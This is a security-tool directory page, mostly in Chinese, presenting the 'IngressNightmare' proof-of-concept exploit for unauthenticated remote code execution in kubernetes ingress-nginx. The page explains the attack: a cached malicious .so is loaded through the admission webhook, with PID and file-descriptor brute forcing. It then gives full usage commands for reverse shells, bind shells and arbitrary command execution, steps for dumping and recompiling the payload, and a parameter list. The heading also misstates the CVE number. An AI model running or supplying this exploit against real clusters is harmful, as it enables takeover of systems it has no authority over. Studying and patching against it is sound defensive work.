Skip to content
KitploitKITPLOIT
工具漏洞利用博客
Log in
提交
工具漏洞利用博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
ingressNightmare-CVE-2025-1974-exps — IngressNightmare POC。全球首个非盲目远程执行利用,采用多种高级利用方法。支持磁盘上的利用。CVE-2025-24514 - auth-url 注入,CVE-2025-1097 - auth-tls-match-cn 注入,CVE-2025-1098 – mirror UID 注入 -- 全部可用。 | Kitploit
工具/GitHubGitHub/esonhugh/ingressnightmare-cve-2025-1974-exps
容器安全漏洞分析漏洞利用Web应用程序漏洞利用渗透测试云安全红队Payload 开发

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
GitHub
esonhugh/ingressnightmare-cve-2025-1974-exps

ingressNightmare-CVE-2025-1974-exps

IngressNightmare POC。全球首个非盲目远程执行利用,采用多种高级利用方法。支持磁盘上的利用。CVE-2025-24514 - auth-url 注入,CVE-2025-1097 - auth-tls-match-cn 注入,CVE-2025-1098 – mirror UID 注入 -- 全部可用。

查看仓库网站
9714101年前Kitploit 审核通过

Ingress Nightmare CVE-2025-1907

描述

此漏洞允许远程攻击者在受影响的 kubernetes/ingress-nginx 安装环境上执行任意代码。利用此漏洞无需身份验证。具体缺陷存在于对 HTTP 请求的处理过程中。

该漏洞通过发送两个请求触发。第一个是发送到同一 Pod 中 NGINX 服务器的长缓冲请求,随后 nginx 会将其缓存为临时文件。第二个请求是发送到准入校验 Webhook 服务器的请求,这会触发准入 Webhook 写入一个包含 ssl_engine badso_location; 指令的临时 nginx 配置。然后准入 Webhook 会运行 nginx -t 来检查配置,从而以 NGINX 服务器的上下文触发远程代码执行。

漏洞利用

# reverse shell 
./ingressnightmare -m r -r ${ur_ip} -p ${port} -i ${INGRESS} -u ${UPLOADER} 

# bind shell # maybe lost?
./ingressnightmare -m b -b ${port} -i ${INGRESS} -u ${UPLOADER} 

# blind command execution
./ingressnightmare -m c  -c 'date >> /tmp/pwn; echo eson pwn >> /tmp/pwn' -i ${INGRESS} -u ${UPLOADER} 

# for CVE-2025-24514 - auth-url injection
# This is the default mode
./ingressnightmare -m c -c 'your command' -i ${INGRESS} -u ${UPLOADER} --is-auth-url 
# same as 
./ingressnightmare -m c -c 'your command' -i ${INGRESS} -u ${UPLOADER}
 
# for CVE-2025-1097 - auth-tls-match-cn injection,
./ingressnightmare -m c -c 'your command' -i ${INGRESS} -u ${UPLOADER} --is-match-cn --auth-secret-name ${secret_name}

# for CVE-2025-1098 – mirror UID injection -- all available
./ingressnightmare -m c -c 'your command' -i ${INGRESS} -u ${UPLOADER} --is-mirror-uid 

## Advanced usage
# Send only admission request
./ingressnightmare -m c -i ${INGRESS} --only-admission --only-admission-file /tmp/evil.so # --is-auth-url # --is-match-cn # --is-mirror-uid ...

# Send only upload request loop
./ingressnightmare -m c -c "your command" -u ${UPLOADER} --only-upload

# dry run mode
## dry run to lookup payload so
./ingressnightmare -m c -c 'your command' -u ${UPLOADER} --dry-run 
# dump with > /tmp/evil.so

## dry run to lookup raw nginx admission 
./ingressnightmare -m c -i ${INGRESS} --only-admission --only-admission-file /tmp/evil.so --dry-run # --is-auth-url # --is-match-cn # --is-mirror-uid ...

## verbose mode
./ingressnightmare -m c -c 'your command' -i ${INGRESS} -u ${UPLOADER} -v # debug 
./ingressnightmare -m c -c 'your command' -i ${INGRESS} -u ${UPLOADER} -vv # trace
./ingressnightmare -vv # -i ${INGRESS} -u ${UPLOADER} # -m c -c 'your command'

## if get error like Exec format error, that means the payload is not compatible with the target system.
## It maybe caused by the target system is arm64, but the payload is x86_64.
## Also the libc version and kernel version may cause this error.
## This exp Works on 5.10 kernel without libc.
## recompile c
./ingressnightmare show-c > exp.c
gcc -fPIC -nostdlib -ffreestanding -fno-builtin -o danger.so exp.c -shared
./ingresnightmare -m c -c 'your command' --so ./danger.so -i ${INGRESS} -u ${UPLOADER}

参数组

该漏洞利用程序的参数过于复杂,我不得不将它们分成几组。

[
     // Set Targets Groups
     {
          option: 	"ingress-webhook-url", "i",
          example:	"https://ingress-nginx-controller-admission.ingress-nginx.svc.cluster.local:443",
          description:	"ingress webhook url"
     },
     {
         option: 	"upload-url", "u",
         example:	"http://ingress-nginx-controller.ingress-nginx.svc.cluster.local:80",
         description: 	"upload url"
    },

    // Set Exploit Method for which CVE
    {
        option:      "is-auth-url", "a",
        example:     "true",
        description: "CVE-2025-24514: using auth-url to attack (default)"
    },
    {
        option:      "is-match-cn", "A",
        example:     "false",
        description: "CVE-2025-1097: using auth-tls-match-cn to attack (not default)"
    },
    {
        option:      "auth-secret-name", "U",
        example:     "kube-system/cilium-ca",
        description: "if using auth-tls-match-cn, secret name is required, example: kube-system/cilium-ca"
    },
    {
        option:      "is-mirror-with-uid", "M",
        example:     "false",
        description: "CVE-2025-1098: using mirror with uid"
    },

    // Set Exploit Mode for reverse shell / bind shell / command
    {
        option:      "mode", "m",
        example:     "r",
        description: "mode reverse-shell(r)/bind-shell(b)/command(c)"
    },
    {
        option:      "reverse-shell-ip", "r",
        example:     "192.168.1.100",
        description: "reverse shell ip"
    },
    {
        option:      "reverse-shell-port", "p",
        example:     "4444",
        description: "reverse shell port"
    },
    {
        option:      "bind-shell-port", "b",
        example:     "4444",
        description: "bind shell port"
    },
    {
        option:      "command", "c",
        example:     "id",
        description: "command"
    },

    // Debug modes
    {
        option:      "verbose", "v",
        example:     "-vv",
        description: "verbose output (debug is -v ; trace is -vv)"
    },
    {
        option:      "dry-run", "d",
        example:     "true",
        description: "dry run and dump payload"
    },

    // test Only Upload Thread / Only Admission Thread modes
    {
        option:      "only-admission", "o",
        example:     "true",
        description: "only admission"
    },
    {
        option:      "only-admission-file", "f",
        example:     "/path/to/file",
        description: "only admission file"
    },
    {
        option:      "only-upload", "O",
        example:     "true",
        description: "only upload"
    },

    // Set guessed PID and FD ranges
    {
        option:      "pid-range-start", "S",
        example:     "5",
        description: "pid range start"
    },
    {
        option:      "pid-range-end", "E",
        example:     "40",
        description: "distance to pid range end"
    },
    {
        option:      "fd-range-start", "s",
        example:     "3",
        description: "fd range start"
    },
    {
        option:      "fd-range-end", "e",
        example:     "26",
        description: "distance fd range end"
    },

    // Advanced Payload: custom so file or json template
    {
        option:      "so", "",
        example:     "/path/to/custom.so",
        description: "custom so file exploit, if u get Exec format error, please recompile the so file from c code. ps: execute `./ingressnightmare show-c` to get source code"
    },
    {
        option:      "validate-json-template", "t",
        example:     "template.json",
        description: "validate json template, using foobar as placeholder to filepath"
    }
]

https://github.com/user-attachments/assets/415d6b81-b907-4aaa-bd99-18640bd64b2b

原理

sequenceDiagram
    box EvilPod
        participant hacker
    end
    box IngressControllerPod
        participant IngressControllerAdmission
        participant IngressControllerNginx
    end
    hacker->>IngressControllerNginx: evil.so file with fake http request length
    activate IngressControllerNginx
    
    activate hacker
    
    hacker->>IngressControllerAdmission: admission injection (please load ../../../../../../proc/1/fd/3 )
    activate IngressControllerAdmission
    Note right of IngressControllerAdmission: trying to execute nginx -t -c tempXXX1.cfg
    Note right of IngressControllerAdmission: nginx -t loading ssl engine /proc/1/fd/3
    Note right of IngressControllerAdmission: Execute Failed, make response with stderr
    IngressControllerAdmission-->> hacker: Error No such file 
    deactivate IngressControllerAdmission
    
    Note left of hacker: Brute forcing the PID and fd
    Note right of IngressControllerNginx: caching the request ...
下载工具